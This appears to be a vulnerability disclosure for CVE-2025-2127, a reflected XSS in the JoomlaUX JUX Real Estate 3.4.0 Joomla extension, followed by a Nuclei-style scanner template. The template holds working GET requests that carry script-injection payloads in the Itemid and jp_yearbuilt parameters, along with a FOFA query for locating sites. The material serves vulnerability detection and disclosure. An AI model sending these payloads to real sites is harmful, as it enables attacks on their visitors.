A vulnerability was found in JoomlaUX JUX Real Estate 3.4.0 on Joomla. It has been classified as problematic. Affected is an unknown function of the file /extensions/realestate/index.php/properties/list/list-with-sidebar/realties. The manipulation of the argument Itemid/jp_yearbuilt leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
PoC代码[已公开]
id: CVE-2025-2127
info:
name: JoomlaUX JUX Real Estate 3.4.0 - Reflected XSS
author: 3th1c_yuk1
severity: medium
description: |
A vulnerability was found in JoomlaUX JUX Real Estate 3.4.0 on Joomla. It has been classified as problematic. Affected is an unknown function of the file /extensions/realestate/index.php/properties/list/list-with-sidebar/realties. The manipulation of the argument Itemid/jp_yearbuilt leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-2127
- https://vuldb.com/?id.299040
- https://vuldb.com/?ctiid.299040
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
cvss-score: 4.3
cve-id: CVE-2025-2127
cwe-id: CWE-79
epss-score: 0.00415
epss-percentile: 0.60921
cpe: cpe:2.3:a:joomlaux:jux_real_estate:3.4.0:*:*:*:*:joomla:*:*
metadata:
vendor: joomlaux
product: jux_real_estate
framework: joomla
fofa-query: body="joomlaux"
verified: true
max-request: 2
tags: cve,cve2025,joomlaux,joomla
http:
- method: GET
path:
- "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=6wdv%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ewz8nu&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=&button=Search"
- "{{BaseURL}}/extensions/realestate/index.php/properties/list/list-with-sidebar/realties?option=com_jux_real_estate&view=realties&Itemid=148&title=&price_slider_lower=63752&price_slider_upper=400000&area_slider_lower=30&area_slider_upper=400&type_id=2&cat_id=8&country_id=73&locstate=187&beds=1&agent_id=112&baths=1&jp_yearbuilt=mzbpj%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3eflmo8&button=Search"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<script>alert(document.domain)</script>'
- 'joomlaux'
condition: and
- type: word
part: content_type
words:
- "text/html"
# digest: 4a0a00473045022036b1db68810d9da6527680affff1f49c7b8dea08720a25eb8dfac62adc5bed80022100a6328a65d5c5136a1b113d3a412f981c1fa6b80f0e0de5a495be807c0244c519:922c64590222798bb761d5b6d8e72950